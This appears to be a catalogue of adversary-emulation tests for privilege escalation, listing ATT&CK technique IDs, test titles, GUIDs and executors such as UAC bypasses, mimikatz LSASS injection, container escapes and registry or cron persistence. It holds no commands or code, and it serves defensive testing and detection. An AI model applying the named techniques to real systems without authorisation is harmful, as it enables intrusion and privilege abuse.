522 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
523 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
524 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
525 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 2 Bypass UAC using Event Viewer (PowerShell) a6ce9acf-842a-4af6-8f79-539be7608e2b powershell
526 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 3 Bypass UAC using Fodhelper 58f641ea-12e3-499a-b684-44dee46bd182 command_prompt
527 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 4 Bypass UAC using Fodhelper - PowerShell 3f627297-6c38-4e7d-a278-fc2563eaaeaa powershell
528 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 5 Bypass UAC using ComputerDefaults (PowerShell) 3c51abf2-44bf-42d8-9111-dc96ff66750f powershell
529 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 6 Bypass UAC by Mocking Trusted Directories f7a35090-6f7f-4f64-bb47-d657bf5b10c1 command_prompt
530 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 7 Bypass UAC using sdclt DelegateExecute 3be891eb-4608-4173-87e8-78b494c029b7 powershell
531 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 8 Disable UAC using reg.exe 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 command_prompt
532 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 9 Bypass UAC using SilentCleanup task 28104f8a-4ff1-4582-bcf6-699dce156608 command_prompt
533 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 10 UACME Bypass Method 23 8ceab7a2-563a-47d2-b5ba-0995211128d7 command_prompt
534 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 11 UACME Bypass Method 31 b0f76240-9f33-4d34-90e8-3a7d501beb15 command_prompt
535 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 12 UACME Bypass Method 33 e514bb03-f71c-4b22-9092-9f961ec6fb03 command_prompt
536 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 13 UACME Bypass Method 34 695b2dac-423e-448e-b6ef-5b88e93011d6 command_prompt
537 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 14 UACME Bypass Method 39 56163687-081f-47da-bb9c-7b231c5585cf command_prompt
538 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 15 UACME Bypass Method 56 235ec031-cd2d-465d-a7ae-68bab281e80e command_prompt
539 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 16 UACME Bypass Method 59 dfb1b667-4bb8-4a63-a85e-29936ea75f29 command_prompt
540 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 17 UACME Bypass Method 61 7825b576-744c-4555-856d-caf3460dc236 command_prompt
541 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 18 WinPwn - UAC Magic 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc powershell
542 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 19 WinPwn - UAC Bypass ccmstp technique f3c145f9-3c8d-422c-bd99-296a17a8f567 powershell
543 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 20 WinPwn - UAC Bypass DiskCleanup technique 1ed67900-66cd-4b09-b546-2a0ef4431a0c powershell
544 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 21 WinPwn - UAC Bypass DccwBypassUAC technique 2b61977b-ae2d-4ae4-89cb-5c36c89586be powershell
545 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key 251c5936-569f-42f4-9ac2-87a173b9e9b8 powershell
546 privilege-escalation T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 23 UAC Bypass with WSReset Registry Modification 3b96673f-9c92-40f1-8a3e-ca060846f8d9 powershell
547 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 Sudo usage 150c3a08-ee6e-48a6-aeaf-3659d24ceb4e sh
548 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 2 Unlimited sudo cache timeout a7b17659-dd5e-46f7-b7d1-e6792c91d0bc sh
549 privilege-escalation T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching 3 Disable tty_tickets for sudo caching 91a60b03-fb75-4d24-a42e-2eb8956e8de1 sh
550 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 1 Service Registry Permissions Weakness f7536d63-7fd4-466f-89da-7e48d550752a powershell
551 privilege-escalation T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness 2 Service ImagePath Change with reg.exe f38e9eea-e1d7-4ba6-b716-584791963827 command_prompt
552 privilege-escalation T1547 Boot or Logon Autostart Execution 1 Add a driver cb01b3da-b0e7-4e24-bf6d-de5223526785 command_prompt
553 privilege-escalation T1547.014 Active Setup 1 HKLM - Add atomic_test key to launch executable as part of user setup deff4586-0517-49c2-981d-bbea24d48d71 powershell
554 privilege-escalation T1547.014 Active Setup 2 HKLM - Add malicious StubPath value to existing Active Setup Entry 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a powershell
555 privilege-escalation T1547.014 Active Setup 3 HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number 04d55cef-f283-40ba-ae2a-316bc3b5e78c powershell
556 privilege-escalation T1484.002 Domain Trust Modification 1 Add Federation to Azure AD 8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7 powershell
557 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 1 Modify Fax service to run PowerShell ed366cde-7d12-49df-a833-671904770b9f command_prompt
558 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 2 Service Installation CMD 981e2942-e433-44e9-afc1-8c957a1496b6 command_prompt
559 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 3 Service Installation PowerShell 491a4af6-a521-4b74-b23b-f7b3f1ee9e77 powershell
560 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 4 TinyTurla backdoor service w64time ef0581fd-528e-4662-87bc-4c2affb86940 command_prompt
561 privilege-escalation T1543.003 Create or Modify System Process: Windows Service 5 Remote Service Installation CMD fb4151a2-db33-4f8c-b7f8-78ea8790f961 command_prompt
562 privilege-escalation T1053.003 Scheduled Task/Job: Cron 1 Cron - Replace crontab with referenced file 435057fb-74b1-410e-9403-d81baf194f75 bash
563 privilege-escalation T1053.003 Scheduled Task/Job: Cron 2 Cron - Add script to all cron subfolders b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 bash
564 privilege-escalation T1053.003 Scheduled Task/Job: Cron 3 Cron - Add script to /var/spool/cron/crontabs/ folder 2d943c18-e74a-44bf-936f-25ade6cccab4 bash
565 privilege-escalation T1574.001 Hijack Execution Flow: DLL Search Order Hijacking 1 DLL Search Order Hijacking - amsi.dll 8549ad4b-b5df-4a2d-a3d7-2aee9e7052a3 command_prompt
566 privilege-escalation T1055.003 Thread Execution Hijacking 1 Thread Execution Hijacking 578025d5-faa9-4f6d-8390-aae527d503e1 powershell
567 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 1 Application Shim Installation 9ab27e22-ee62-4211-962b-d36d9a0e6a18 command_prompt
568 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 2 New shim database files created in the default shim database directory aefd6866-d753-431f-a7a4-215ca7e3f13d powershell
569 privilege-escalation T1546.011 Event Triggered Execution: Application Shimming 3 Registry key creation and/or modification events for SDB 9b6a06f9-ab5e-4e8d-8289-1df4289db02f powershell
570 privilege-escalation T1547.010 Boot or Logon Autostart Execution: Port Monitors 1 Add Port Monitor persistence in Registry d34ef297-f178-4462-871e-9ce618d44e50 command_prompt
571 privilege-escalation T1037.002 Boot or Logon Initialization Scripts: Logon Script (Mac) 1 Logon Scripts - Mac f047c7de-a2d9-406e-a62b-12a09d9516f4 manual
572 privilege-escalation T1055 Process Injection 1 Shellcode execution via VBA 1c91e740-1729-4329-b779-feba6e71d048 powershell
573 privilege-escalation T1055 Process Injection 2 Remote Process Injection in LSASS via mimikatz 3203ad24-168e-4bec-be36-f79b13ef8a83 command_prompt
574 privilege-escalation T1055 Process Injection 3 Section View Injection c6952f41-6cf0-450a-b352-2ca8dae7c178 powershell
575 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
576 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
577 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 1 Shortcut Modification ce4fc678-364f-4282-af16-2fb4c78005ce command_prompt
578 privilege-escalation T1547.009 Boot or Logon Autostart Execution: Shortcut Modification 2 Create shortcut to cmd in startup folders cfdc954d-4bb0-4027-875b-a1893ce406f2 powershell
579 privilege-escalation T1547.005 Boot or Logon Autostart Execution: Security Support Provider 1 Modify SSP configuration in registry afdfd7e3-8a0b-409f-85f7-886fdf249c9e powershell
580 privilege-escalation T1543.004 Create or Modify System Process: Launch Daemon 1 Launch Daemon 03ab8df5-3a6b-4417-b6bd-bb7a5cfd74cf bash
581 privilege-escalation T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking 1 powerShell Persistence via hijacking default modules - Get-Variable.exe 1561de08-0b4b-498e-8261-e922f3494aae powershell
582 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 1 LockBit Black - Modify Group policy settings -cmd 9ab80952-74ee-43da-a98c-1e740a985f28 command_prompt
583 privilege-escalation T1484.001 Domain Policy Modification: Group Policy Modification 2 LockBit Black - Modify Group policy settings -Powershell b51eae65-5441-4789-b8e8-64783c26c1d1 powershell
584 privilege-escalation T1078.001 Valid Accounts: Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
585 privilege-escalation T1078.001 Valid Accounts: Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
586 privilege-escalation T1078.001 Valid Accounts: Default Accounts 3 Enable Guest Account on macOS 0315bdff-4178-47e9-81e4-f31a6d23f7e4 command_prompt
587 privilege-escalation T1547.003 Time Providers 1 Create a new time provider df1efab7-bc6d-4b88-8be9-91f55ae017aa powershell
588 privilege-escalation T1547.003 Time Providers 2 Edit an existing time provider 29e0afca-8d1d-471a-8d34-25512fc48315 powershell
589 privilege-escalation T1546.005 Event Triggered Execution: Trap 1 Trap EXIT a74b2e07-5952-4c03-8b56-56274b076b61 sh
590 privilege-escalation T1546.005 Event Triggered Execution: Trap 2 Trap SIGINT a547d1ba-1d7a-4cc5-a9cb-8d65e8809636 sh
591 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 1 Shared Library Injection via /etc/ld.so.preload 39cb0e67-dd0d-4b74-a74b-c072db7ae991 bash
592 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 2 Shared Library Injection via LD_PRELOAD bc219ff7-789f-4d51-9142-ecae3397deae bash
593 privilege-escalation T1574.006 Hijack Execution Flow: LD_PRELOAD 3 Dylib Injection via DYLD_INSERT_LIBRARIES 4d66029d-7355-43fd-93a4-b63ba92ea1be bash
594 privilege-escalation T1134.002 Create Process with Token 1 Access Token Manipulation dbf4f5a9-b8e0-46a3-9841-9ad71247239e powershell
595 privilege-escalation T1134.002 Create Process with Token 2 WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique ccf4ac39-ec93-42be-9035-90e2f26bcd92 powershell
596 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 1 Make and modify binary from C source 896dfe97-ae43-4101-8e96-9a7996555d80 sh
597 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 2 Set a SetUID flag on file 759055b3-3885-4582-a8ec-c00c9d64dd79 sh
598 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 3 Set a SetGID flag on file db55f666-7cba-46c6-9fe6-205a05c3242c sh
599 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 4 Make and modify capabilities of a binary db53959c-207d-4000-9e7a-cd8eb417e072 sh
600 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 5 Provide the SetUID capability to a file 1ac3272f-9bcf-443a-9888-4b1d3de785c1 sh
601 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 6 Do reconnaissance for files that have the setuid bit set 8e36da01-cd29-45fd-be72-8a0fcaad4481 sh
602 privilege-escalation T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid 7 Do reconnaissance for files that have the setgid bit set 3fb46e17-f337-4c14-9f9a-a471946533e2 sh
603 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
604 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
605 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
606 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
607 privilege-escalation T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
608 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
609 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
610 privilege-escalation T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
611 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
612 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
613 privilege-escalation T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
614 privilege-escalation T1055.004 Process Injection: Asynchronous Procedure Call 1 Process Injection via C# 611b39b7-e243-4c81-87a4-7145a90358b1 command_prompt
615 privilege-escalation T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
616 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
617 privilege-escalation T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
618 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 1 Named pipe client impersonation 90db9e27-8e7c-4c04-b602-a45927884966 powershell
619 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 2 `SeDebugPrivilege` token duplication 34f0a430-9d04-4d98-bcb5-1989f14719f0 powershell
620 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 3 Launch NSudo Executable 7be1bc0f-d8e5-4345-9333-f5f67d742cb9 powershell
621 privilege-escalation T1134.001 Access Token Manipulation: Token Impersonation/Theft 4 Bad Potato 9c6d799b-c111-4749-a42f-ec2f8cb51448 powershell
622 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
623 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
624 privilege-escalation T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
625 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 1 Parent PID Spoofing using PowerShell 069258f4-2162-46e9-9a25-c9c6c56150d2 powershell
626 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 2 Parent PID Spoofing - Spawn from Current Process 14920ebd-1d61-491a-85e0-fe98efe37f25 powershell
627 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 3 Parent PID Spoofing - Spawn from Specified Process cbbff285-9051-444a-9d17-c07cd2d230eb powershell
628 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 4 Parent PID Spoofing - Spawn from svchost.exe e9f2b777-3123-430b-805d-5cedc66ab591 powershell
629 privilege-escalation T1134.004 Access Token Manipulation: Parent PID Spoofing 5 Parent PID Spoofing - Spawn from New Process 2988133e-561c-4e42-a15f-6281e6a9b2db powershell
630 privilege-escalation T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
631 privilege-escalation T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
632 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
633 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
634 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
635 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
636 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
637 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
638 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
639 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
640 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
641 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
642 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
643 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
644 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
645 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
646 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
647 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
648 privilege-escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
649 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
650 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
651 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
652 privilege-escalation T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 4 Snake Malware Kernel Driver Comadmin e5cb5564-cc7b-4050-86e8-f2d9eec1941f powershell
653 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
654 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
655 privilege-escalation T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
656 privilege-escalation T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
657 privilege-escalation T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
658 privilege-escalation T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
659 privilege-escalation T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
660 privilege-escalation T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
661 privilege-escalation T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
662 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
663 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
664 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 3 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
665 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 4 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
666 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 5 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
667 privilege-escalation T1546.004 Event Triggered Execution: .bash_profile and .bashrc 6 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
668 privilege-escalation T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
669 privilege-escalation T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
670 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
671 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
672 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
673 privilege-escalation T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
674 privilege-escalation T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
675 privilege-escalation T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
676 privilege-escalation T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
677 privilege-escalation T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
678 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
679 privilege-escalation T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
680 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
681 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
682 privilege-escalation T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 bash
683 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
684 privilege-escalation T1543.002 Create or Modify System Process: Systemd Service 2 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
685 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
686 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
687 privilege-escalation T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
688 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 1 DLL Side-Loading using the Notepad++ GUP.exe binary 65526037-7079-44a9-bda1-2cb624838040 command_prompt
689 privilege-escalation T1574.002 Hijack Execution Flow: DLL Side-Loading 2 DLL Side-Loading using the dotnet startup hook environment variable d322cdd7-7d60-46e3-9111-648848da7c02 command_prompt
690 privilege-escalation T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
691 privilege-escalation T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
692 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
693 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
694 privilege-escalation T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
695 privilege-escalation T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
696 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 1 Process Injection via mavinject.exe 74496461-11a1-4982-b439-4d87a550d254 powershell
697 privilege-escalation T1055.001 Process Injection: Dynamic-link Library Injection 2 WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 powershell
